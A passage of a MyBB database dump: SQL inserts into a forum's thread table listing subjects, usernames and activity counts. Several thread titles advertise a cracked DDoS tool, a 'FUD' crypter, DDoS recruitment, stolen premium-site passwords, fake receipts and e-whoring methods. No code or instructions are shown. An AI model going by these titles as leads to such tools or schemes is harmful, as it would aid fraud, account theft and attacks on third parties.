'0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1006', '54', 'playboy premium acount for lifetime', '0', '17', '0', '255', 'sbhshroy2', '1350709799', '5676', '1350724549', 'R?????zo?', '62', '2', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1007', '54', 'uncommonporn premium acounts', '0', '0', '0', '255', 'sbhshroy2', '1350710106', '5678', '1350724588', 'R?????zo?', '62', '3', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1021', '76', 'rage cheats and tips', '0', '0', '0', '257', 'XxTREYZxX', '1350800076', '5842', '1350800076', 'XxTREYZxX', '257', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1013', '16', 'The Official Magical Book of Free Food', '0', '0', '0', '62', 'R?????zo?', '1350748973', '5741', '1351216084', 'Romdu62', '7', '12', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1008', '24', 'Desktop or Lappy?', '0', '0', '0', '205', 'mothered', '1350732548', '5702', '1350875325', 'Exposé', '222', '38', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1009', '74', 'minecraft server setup tut', '0', '0', '0', '257', 'XxTREYZxX', '1350737882', '5710', '1351034467', 'XxTREYZxX', '257', '21', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1010', '44', '[TUT] How To Photoshop Serials/Numbers And Text Next To Images!', '0', '0', '0', '62', 'R?????zo?', '1350738603', '5711', '1350747050', 'Apathy', '2', '9', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1011', '44', '[TUT]How To Make A Realistic Fake Receipt [TUT]', '0', '0', '0', '62', 'R?????zo?', '1350743760', '5715', '1350831901', 'R?????zo?', '62', '25', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1012', '16', 'Huge SE Dump', '0', '0', '0', '62', 'R?????zo?', '1350746764', '5721', '1350923416', 'R?????zo?', '62', '22', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1014', '7', 'My awards Or My Achievements plugin ?!', '0', '0', '0', '228', 'VirtualLegend', '1350754961', '5756', '1350757415', 'sirchamp', '53', '29', '6', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1019', '3', 'Do you like your new?', '0', '0', '0', '1', 't3h jok3r', '1350797591', '5836', '1350860469', 'iTzIpod', '82', '71', '15', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1015', '7', 'Grounded', '0', '0', '0', '214', 'Rave™', '1350766905', '5791', '1350843604', 'iTzIpod', '82', '41', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1016', '7', 'Flying Steps', '0', '0', '0', '205', 'mothered', '1350772539', '5809', '1350821032', 'mothered', '205', '8', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1017', '11', 'Wifi hacking help :O', '0', '0', '0', '257', 'XxTREYZxX', '1350782543', '5822', '1350873271', 'XxTREYZxX', '257', '30', '8', '0', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1018', '47', 'giving away premium account', '0', '0', '0', '257', 'XxTREYZxX', '1350785225', '5826', '1350851522', 'XxTREYZxX', '257', '12', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1020', '73', 'How to make your ipod\'s battery 90 percent longer', '0', '0', '0', '257', 'XxTREYZxX', '1350799793', '5840', '1351654586', 't3h jok3r', '1', '23', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1022', '72', 'how to make you pro at sniping MW3', '0', '0', '0', '257', 'XxTREYZxX', '1350800397', '5843', '1350800397', 'XxTREYZxX', '257', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1023', '4', 'New member here!!', '0', '0', '0', '258', 'PiXEL^OG', '1350800921', '5844', '1350841549', 'PiXEL^OG', '258', '39', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1027', '58', '[ Updated ] Marketers Group Request', '0', '17', '0', '228', 'VirtualLegend', '1350843854', '5909', '1350909386', 'R?????zo?', '62', '28', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1024', '72', 'mw3 intell locations.', '0', '17', '0', '257', 'XxTREYZxX', '1350809785', '5857', '1350809785', 'XxTREYZxX', '257', '4', '0', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1025', '72', 'mw3 Black tuesday intell location', '0', '17', '0', '257', 'XxTREYZxX', '1350810091', '5858', '1350810091', 'XxTREYZxX', '257', '9', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1026', '3', '1000 THREADS !!!!', '0', '0', '0', '228', 'VirtualLegend', '1350821588', '5869', '1350853095', 'Exposé', '222', '31', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1036', '30', 'Mega SEO Pack', '0', '0', '0', '62', 'R?????zo?', '1350860809', '5975', '1350906095', 'R?????zo?', '62', '7', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1028', '12', '[Tutorial] How to create a Fake Prank Wifi Access Point', '0', '0', '0', '4', 'Triple H', '1350847562', '5928', '1351030175', 'dccfoux', '285', '17', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1029', '2', 'Testing new plugin v.1', '0', '0', '0', '1', 't3h jok3r', '1350856892', '5947', '1350856892', 't3h jok3r', '1', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1030', '2', 'Testing new plugin v.2', '0', '0', '0', '1', 't3h jok3r', '1350857082', '5948', '1350857295', 't3h jok3r', '1', '7', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1031', '7', 'Testing new plugin public', '0', '0', '0', '1', 't3h jok3r', '1350857627', '5951', '1350938257', 'spacefish36', '8', '100', '18', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1041', '81', 'How to get a FREE Skype Resolver/Cloudflare Resolver', '0', '0', '0', '100', '??zg???g????61', '1350861694', '5994', '1350921902', '??zg???g????61', '100', '16', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1032', '3', 'Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '0', '0', '1', 't3h jok3r', '1350859516', '5960', '1350873877', 't3h jok3r', '1', '69', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1033', '30', '[FREEInstagram Bot [Worth 47$]', '0', '0', '0', '62', 'R?????zo?', '1350859569', '5961', '1351988055', 'iTzIpod', '82', '17', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1034', '81', '[Cracked] Dark DDoSeR 5.1', '0', '0', '0', '62', 'R?????zo?', '1350859705', '5962', '1350861734', '??zg???g????61', '100', '8', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1035', '20', 'NEW | FREE | Aegis Crypter | 100%FUD | UPDATE[14/10/2012]', '0', '0', '0', '62', 'R?????zo?', '1350859841', '5963', '1350902334', 'VirtualLegend', '228', '15', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1037', '30', 'Empireviews Type 2 Bot', '0', '0', '0', '62', 'R?????zo?', '1350860869', '5977', '1350913591', 'VirtualLegend', '228', '14', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1038', '17', 'Viral Adult Goldmine™ Combined E-whoring Method?', '0', '0', '0', '62', 'R?????zo?', '1350861034', '5979', '1350861530', 'XxTREYZxX', '257', '14', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1039', '61', 'Jump Start Your brain -Get easy A\'s in school + BOOST brain power,IMPROVE memory', '0', '0', '0', '62', 'R?????zo?', '1350861266', '5984', '1351218606', 'p420', '9', '13', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1042', '3', '[Bug] MyCodes in Signature', '0', '0', '0', '82', 'iTzIpod', '1350862152', '6000', '1350862243', 't3h jok3r', '1', '14', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1040', '61', 'How To Get Passes To Porn Sites', '0', '0', '0', '62', 'R?????zo?', '1350861351', '5986', '1352648872', 'VirtualLegend', '228', '9', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1043', '58', '[NEW] Group Recruiting - DDoS\'ers', '0', '1', '0', '100', '??zg???g????61', '1350868687', '6019', '1350868687', '??zg???g????61', '100', '0', '0', '', '0', '0', '0', '', '-2', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1049', '49', 'User tagging anyone?', '0', '0', '0', '222', 'Exposé', '1350878377', '6057', '1350902512', 'VirtualLegend', '228', '17', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1044', '2', 'dkdadwa', '0', '0', '0', '61', 'NXK', '1350874777', '6036', '1350874777', 'NXK', '61', '6', '0', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1045', '49', 'Group Format?', '0', '0', '0', '222', 'Exposé', '1350874906', '6037', '1350943512', 'Exposé', '222', '69', '13', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1050', '7', 'What do you do to relax?', '0', '0', '0', '205', 'mothered', '1350878540', '6058', '1352562104', 'iTzIpod', '82', '22', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1046', '43', 'Free PID\'s :D', '0', '0', '0', '222', 'Exposé', '1350875931', '6046', '1350892661', 'Exposé', '222', '19', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1047', '16', 'Get free Otterbox cases!', '0', '0', '0', '222', 'Exposé', '1350876167', '6049', '1351303504', 'iTzIpod', '82', '18', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1048', '64', 'Good sports stream!', '0', '0', '0', '61', 'NXK', '1350877760', '6055', '1350901356', 'R?????zo?', '62', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1088', '49', 'Best unique and useful suggestion', '0', '0', '0', '5', 'Timmy', '1351137172', '6327', '1351482501', 't3h jok3r', '1', '34', '9', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1051', '58', 'Advertisers Applications', '0', '0', '0', '3', '??????????¢™', '1350880695', '6060', '1351023474', 'Anonymous™', '199', '33', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1052', '65', 'Wrong Turn 5 found it kinda boring', '0', '0', '0', '1', 't3h jok3r', '1350881174', '6061', '1350882590', 'Exposé', '222', '7', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1053', '54', 'Brazzers,Bangbros,RK,...and more HUGE MIXXX OF WORKING PASSES FOR 22.OKT.2012', '0', '17', '0', '255', 'sbhshroy2', '1350900766', '6070', '1350900766', 'sbhshroy2', '255', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1054', '54', '[22 oct] Tonightsgirlfriend x 5 freshly cracked*No Download*', '0', '17', '0', '255', 'sbhshroy2', '1350900859', '6071', '1350900859', 'sbhshroy2', '255', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1055', '54', 'rapidshare Premium Account *No Download*', '0', '17', '0', '255', 'sbhshroy2', '1350900941', '6072', '1350902051', 'VirtualLegend', '228', '4', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1064', '4', 'Greetings from NowhereLand', '0', '0', '0', '284', 'h3rcul3s', '1350916547', '6123', '1351034623', 'XxTREYZxX', '257', '27', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1072', '24', 'iPad Mini?', '0', '0', '0', '285', 'dccfoux', '1351030378', '6218', '1351051939', 'mothered', '205', '10', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1056', '9', 'make money by shortening websites', '0', '17', '0', '255', 'sbhshroy2', '1350902461', '6083', '1351005405', 'sirchamp', '53', '10', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1065', '5', 'We have a problem here.', '0', '0', '0', '61', 'NXK', '1350919907', '6127', '1350919907', 'NXK', '61', '8', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, 